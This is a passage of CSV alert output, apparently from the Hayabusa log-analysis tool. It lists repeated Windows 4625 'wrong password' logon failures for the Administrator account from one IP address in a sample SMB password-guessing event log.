NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wxgzMKd7eDwzs8WO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q2RljqAhn0NZhR6O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.268 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcxQVtjMqnE1wGfr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fSRggYsSiJGsGSyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQqfSKOyKLSILPrQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7oAI2q6YCu8btlK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KniVwndqE9aC6cIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FgQbvpfuS11matJi | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R9TwJS4B9ZaDD2Ze | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPUuoopOnwlTjlTP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9VEyOUuiOi8Q3JBJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGGGazMTBBfrppDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NKO4V35Y2qPEB59W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.964 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WxVdhpR7ZnAluurU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZjAZb9bQKZjwL8u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aKyLX5ChpgBuFEbr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49t2xJvH2yHcyHle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sg9Z6Pyix2UkMolr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0NN2olYn97ZoYCja | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S98j54bDGsz0k6g9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxFEw9s0nnEQGzUN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSswFHFSlqcQd47k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7icutlVIWSLZJszQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSwyugYn0n3i5f25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.473 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmBaLCUcR7TmixTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1oOBz2NQSCdTwa7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O4tU1LPF5DRW9Vm0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRsSNqPYruWBzp2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3JZhBLzt4af1VtCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dFLZIKSDBvBaWq59 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: guAG4ZTFMjZAxp1A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yd04xsSIdiczICeG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cx3i1URKPhC6KWI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Npc6IS27HsWP3JA9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIBnr0eZ1bHHGokW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.013 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6gTTrUVjpPU80LlC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZlmUbCNAJga24JH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zf3aSGBMe97VujaH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bx7ZM77aDG7y6Lh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BnHHAClMwyqA3TTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00ibRrYvnFt5w9X0 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VglTKbnLVFvHZHzQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NwX0sDFwHQG7Tkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3mMx3M1zurKMBzyj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sH7b8P0O0uea3PlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJcrTyBPuX0TcvOT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.574 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwuZIQAL3BmJnPsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxgAfsnH6YWLRD0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ttBOjzmEBjr9W2QW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FPDKGGYkJQeWgtUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nSoJWqS6YPbpCiBf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pr2oMzxv7pcDfsgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jiopmZAMpwg3dEaA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG1Bxm0lt3vwoO5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Kf5AaQX7KOVAIAN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW9nBirBTHIXIrfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9qKcDhfcf2kMk00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9NgStzf2xQ4P7q0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9mCrjQykX06IcMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7S0QccvEhetekdDP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n1OnibuatFHwDeLz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8u26bKzFOw12m0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WEEtOj6BOkI7MPY1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiCpuqll36DojD3e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9zjo9ZsSVLZcrsr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KKDD0O5flEsIEDRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jdPMREVdBEJ50ELC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p7YwRYYCnsr2v08C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWyAzzpmxUm2CXE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9RNqhxyUBjUIic0n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1JERyz3mOBZt2jki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0i93RW5AOsIKKMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U3XEu06vE68O900O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0fxeGE2jXOnoJttj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
